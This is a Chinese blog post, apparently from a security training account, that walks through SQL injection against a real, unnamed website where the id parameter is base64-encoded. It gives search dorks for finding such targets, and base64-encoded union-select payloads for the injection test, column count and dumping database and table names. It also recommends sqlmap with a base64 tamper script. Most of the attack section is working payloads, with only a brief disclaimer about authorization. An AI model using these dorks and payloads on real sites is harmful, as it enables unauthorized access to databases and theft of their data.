扫码领资料

获网安教程

免费&进群

本文由掌控安全学院 - sbhglqy 投稿

一、资产搜集

我们都知道sql注入的传参有些是明文的，有些是经过编码或者加密的，所以我们搜索的时候不要仅限于inurl:.php?id=1，可以额外的尝试搜搜1的base64编码值MQ==，即可以搜索inurl:.php?id=MQ==，或者搜索1的md5加密值，即可以搜索inrul:.php?id=a0b923820dcc509a。这样子搜索完，我们可测试的范围就扩大了。此处我就是利用inurl:.php?id=MQ==搜索到了一处存在sql注入的网站。

二、开始sql注入常规流程

（1）判断字符型还是数字型

?id=MQ==        (原始值为1)
?id=MeKAmQ==    (原始值为1')

从这两者的反应可以判断出是数字型。
（2）判断是否存在sql注入漏洞

?id=MSBhbmQgMT0x        (原始值1 and 1=1) 有内容
?id=MSBhbmQgMT0y        (原始值1 and 1=2) 没有内容，页面下方空白

可以判断出此处可能存在sql注入。
（3）判断列数

?id=MSBvcmRlciBieSAz    (原始值1 order by 3) 页面内容正常输出
?id=MSBvcmRlciBieSA0    (原始值1 order by 4) 报错

可以判断列数为3。
（4）判断显错位。

?id=LTEgdW5pb24gc2VsZWN0IDEsMiwz        (原始值-1 union select 1,2,3)

显错位为2和3。
（5）在显错位2的位置上尝试获取当前数据库

?id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwz        (原始值-1 union select 1,database(),3)

（6）获取当前数据库中的表

id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgp

原始值：-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

（7）接下来就是获取其中某一个表的字段名和字段值了，只需将相应的SQL语句进行BASE64编码，然后输入即可。

三、sqlmap验证

由于传参是需要进行base64编码的，所以此处我们在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本，只需要在常规的语句中机上--tamper base64encode.py即可。

总结：测试sql注入的时候不要只局限于明文传输，也要注意编码或者加密后的值。

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，

所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

没看够~？欢迎关注！

分享本文到朋友圈，可以凭截图找老师领取

上千教程+工具+交流群+靶场账号哦

 

 分享后扫码加我！

回顾往期内容

Xray挂机刷漏洞

零基础学黑客，该怎么学？

网络安全人员必考的几本证书！

文库｜内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转，没有封禁的IP！

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力

原文始发于微信公众号（掌控安全EDU）：实战 | SQL注入思路扩展